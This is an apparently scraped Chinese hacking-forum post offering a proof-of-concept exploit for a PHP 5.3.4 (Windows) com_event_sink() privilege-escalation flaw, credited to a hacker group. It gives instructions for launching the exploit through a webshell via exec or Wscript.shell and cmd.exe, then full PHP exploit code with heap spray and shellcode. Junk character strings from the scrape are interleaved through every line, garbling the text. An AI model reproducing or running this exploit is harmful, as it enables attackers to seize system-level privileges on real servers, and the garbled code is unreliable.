|
|
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中6 S y/ C% G- M
- X0 W8 @% }: Y1 Q( W d- `
测试方法如下:cmd /c x:\php\php.exe x:\test.php
6 z9 E5 {& `2 O/ b; L# ~$ o) J+ b/ j& `
下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php- v' _! p+ N3 s) s! o0 }9 s
这里是两个测试的截图:
( d8 z k; H8 H" w
% c. Z& {% K& U! w' K
7 q- G6 O9 [8 u- L* _# z \: R; ~ ?1 z- B1 Y3 F. W9 l
3 e- C* ]& }. D& c
3 q5 n( B Q& X. K0 n
成功利用此漏洞的攻击者将获得系统的最高权限+ V, c4 w- L. `( e" V8 t |
' b9 R. m! v w# w
$ c; x1 W5 _5 e" ~3 ]0 U) d; C% {! M8 s4 m
) X5 l1 `/ P- q' X' O
! X+ {" L; G" n- B" Z% s+ J关于漏洞分析稍后附上。一下是PoC代码:
# t/ m" b( T7 U; e: K* O& w" z8 G) D+ Z+ Z3 q5 o
<?php" h9 x; z; f# f: ?* g: F: K# x8 ^" o
//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
" A8 E m, s7 C9 h. j6 a//$eip ="\x44\x43\x42\x41";
' H5 z4 W# Z& K- ^) j0 ?) q$eip= "\x4b\xe8\x57\x78";+ N' C9 {% a' ~6 u% K3 U4 ?+ H0 }
$eax ="\x80\x01\x8d\x04";
6 h' ~# f, d! G8 P) o y, m$deodrant="";6 j Z# S1 V+ C, k- g9 B6 V
$axespray = str_repeat($eip.$eax,0x80);, l2 Q K$ R r5 v9 g
//048d0190% y$ b3 ~6 o2 O% d! I
echo strlen($axespray);
: L. C4 W0 F3 G2 Recho "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
4 ? I6 P, F6 C5 \0 F3 n0 Necho "Silic Group Hacker Army - BlackBap.Org";: _+ A7 w$ S0 f3 ]
//19200 ==4B32 4b00
- N: y Z$ p1 P: Rfor($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
# x# e T9 |/ |1 M' w$terminate = "T";7 R! K9 z' m. K" v, N
$u[] =$deodrant;
6 I' |5 k5 v0 x$r[] =$deodrant.$terminate;. X5 b+ q5 U5 _5 k) _% k+ T+ X
$a[] =$deodrant.$terminate;
4 C+ G9 F1 n" @9 P$s[] =$deodrant.$terminate;
3 s# L l0 P; L) k: W, K//$vVar = new VARIANT(0x048d0038+$offset); 这里是可控可改的
, Y3 z+ _: L" w$vVar = new VARIANT(0x048d0000+180);, S* ~+ b: w- N& Z
//弹窗代码(Shellcode)
; X# q# i9 `7 S8 M$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
) }" N1 G* R- p4 ^" F" V$var2 = new VARIANT(0x41414242);
4 f6 d' r z& N3 V& @com_event_sink($vVar,$var2,$buffer);' D" I; C) w$ e9 `& R7 Z% d0 p" J' H
?>& `3 N8 e" H2 ]
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|